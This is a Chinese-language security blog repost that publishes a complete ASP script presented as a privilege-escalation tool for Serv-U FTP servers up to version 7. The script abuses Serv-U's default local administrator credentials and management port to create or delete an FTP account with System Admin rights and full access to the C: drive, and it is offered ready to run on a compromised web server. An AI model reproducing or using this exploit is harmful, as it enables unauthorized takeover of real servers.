Technology su提权通杀asp脚本(支持SU7)

0 Comments

精选文章,转载请注明: 转载自太子King’S Blog

本文链接地址: su提权通杀asp脚本(支持SU7)

文章作者:xiaok[J.L.S.T]
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn)

一直通杀到su7~~

用来加ftp帐号的……

<title>Serv-U TOOL</title>
<style type="text/css">
body {
background-color: #333333;
}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {
  color: #333333;
  border: 1px solid #000000
#;
}
.TextBox {border: 1px solid #084B8E}
body,td,th {
  color: #CCCCCC;
}
</style>
<p align="center">Serv-U Local Add User with ASP</p>
<p align="center">Author: Xiao.K</p>
<form name="form1" method="post" action="">
<p align="center">
——————Serv-U Information——————
<br>
user:
<input name="duser" type="text" class="TextBox" id="duser" value="LocalAdministrator">
<br>
pwd :
<input name="dpwd" type="text" class="TextBox" id="dpwd" value="#l@$ak#.lk;0@P">
<br>
port:
<input name="dport" type="text" class="TextBox" id="dport" value="43958">
<br>
———————Add User!!! ———————
<BR>
Domain:  
<input name="domain" type="text" class="TextBox" id="domain" value="secdst" />
<br>
FTP USER:
<input name="fuser" type="text" class="TextBox" id="fuser" value="xiaok">
<br>
FTP PASS:
<input name="fpass" type="text" class="TextBox" id="fpass" value="bbs.secdst.net">
<br>
FTP PORT:
<input name="fport" type="text" class="TextBox" id="fport" value="21">
<br>
FTP PATH:
<input name="fpath" type="text" class="TextBox" id="fpath" value="c:\\">
<br>
Privilege
<select para=value name="privilege">
  <option value=2>Read-only Admin</option>
<option value=3>Group Admin</option>
<option value=4>Domain Admin</option>
<option value=5>System Admin</option>
</select>
</p>
<p align="center">


<input name="radiobutton" type="radio" value="add" checked class="TextBox">
Add User
<input type="radio" name="radiobutton" value="del" class="TextBox">
Del User </p>
<p align="center">
<input name="Submit" type="submit" class="buttom" value="Run" />
</p>
</form>
<%
user = request.Form("duser")
pass = request.Form("dpwd")
port = request.Form("dport")
domain = request.Form("domain")
fuser = request.Form("fuser")
fpass = request.Form("fpass")
fport = request.Form("fport")
fpath = request.Form("fpath")
privilege=request.Form("privilege")
select case privilege
case 2:
privilege="ReadOnly"
case 3:
privilege="Group"
case 4:
privilege="Domain"
case 5:
privilege="System"
end select
  if request.Form("radiobutton") = "add" Then

loginuser = "User " &amp; user &amp; vbCrLf
loginpass = "Pass " &amp; pass &amp; vbCrLf
mt = "SITE MAINTENANCE" &amp; vbCrLf
newdomain = "-SETDOMAIN" &amp; vbCrLf &amp; "-Domain=" &amp; domain &amp;"&amp;#124;0.0.0.0&amp;#124;" &amp; fport &amp; "&amp;#124;-1&amp;#124;1&amp;#124;0" &amp; vbCrLf &amp; "-DynDNSEnable=0" &amp; vbCrLf &amp; " DynIPName=" &amp; vbCrLf
newuser = "-SETUSERSETUP" &amp; vbCrLf &amp; "-IP=0.0.0.0" &amp; vbCrLf &amp; "-PortNo=" &amp; fport &amp; vbCrLf &amp; "-User="&amp; fuser &amp; vbCrLf &amp; "-Password=" &amp; fpass &amp; vbCrLf &amp; _
"-HomeDir=" &amp; fpath &amp; vbCrLf &amp; "-LoginMesFile=" &amp; vbCrLf &amp; "-Disable=0" &amp; vbCrLf &amp; "-RelPaths=1" &amp; vbCrLf &amp; _
"-NeedSecure=0" &amp; vbCrLf &amp; "-HideHidden=0" &amp; vbCrLf &amp; "-AlwaysAllowLogin=0" &amp; vbCrLf &amp; "-ChangePassword=0" &amp; vbCrLf &amp; _
"-QuotaEnable=0" &amp; vbCrLf &amp; "-MaxUsersLoginPerIP=-1" &amp; vbCrLf &amp; "-SpeedLimitUp=0" &amp; vbCrLf &amp; "-SpeedLimitDown=0" &amp; vbCrLf &amp; _
"-MaxNrUsers=-1" &amp; vbCrLf &amp; "-IdleTimeOut=600" &amp; vbCrLf &amp; "-SessionTimeOut=-1" &amp; vbCrLf &amp; "-Expire=0" &amp; vbCrLf &amp; "-RatioUp=1" &amp; vbCrLf &amp; _
"-RatioDown=1" &amp; vbCrLf &amp; "-RatiosCredit=0" &amp; vbCrLf &amp; "-QuotaCurrent=0" &amp; vbCrLf &amp; "-QuotaMaximum=0" &amp; vbCrLf &amp; _
"-Maintenance=" &amp; privilege &amp; vbCrLf &amp; "-PasswordType=Regular" &amp; vbCrLf &amp; "-Ratios=None" &amp; vbCrLf &amp; " Access=" &amp; fpath &amp;"&amp;#124;RWAMELCDP" &amp; vbCrLf
quit = "QUIT" &amp; vbCrLf    
    '——–
    'On Error Resume Next
    Set xPost = CreateObject("Microsoft.XMLHTTP")
    xPost.Open "POST", "http://127.0.0.1:"&amp; port &amp;"/secdst",True, "", ""
    xPost.Send loginuser &amp; loginpass &amp; mt &amp; newdomain &amp; newuser &amp; quit
    Set xPost =nothing
    response.write "<div align="&amp;chr(34 )&amp;"center"&amp;chr(34 )&amp;">FTP user "&amp;fuser&amp;" pass "&amp;fpass&amp;" at port "&amp; fport &amp;"</div>"
  elseif request.Form("radiobutton") = "del" Then
  
    loginuser = "User " &amp; user &amp; vbCrLf
    loginpass = "Pass " &amp; pass &amp; vbCrLf
    mt = "SITE MAINTENANCE" &amp; vbCrLf
    deluser = "-DELETEUSER" &amp; vbcrlf &amp; "-IP=0.0.0.0" &amp; vbcrlf &amp; "-PortNo=" &amp; port &amp; vbcrlf &amp; " User="&amp; fuser &amp; vbcrlf
    quit = "QUIT" &amp; vbCrLf  
    Set xPost3 = CreateObject("MSXML2.XMLHTTP")
    xPost3.Open "POST", "http://127.0.0.1:"&amp; port &a
mp;amp;"/secdst", True
    xPost3.Send loginuser &amp; loginpass &amp; mt &amp; deluser &amp; quit
    Set xPOST3=nothing
    response.write "<div align="&amp;chr(34 )&amp;"center"&amp;chr(34 )&amp;">FTP user "&amp;fuser&amp;" pass "&amp;fpass&amp;" at port "&amp; fport &amp;" have deleted</div>"
  else
    response.write "<div align="&amp;chr(34 )&amp;"center"&amp;chr(34 )&amp;">let's Start!!!</div>"
  end if

%>

相关文章
  • 暂无相关日志

Leave a Reply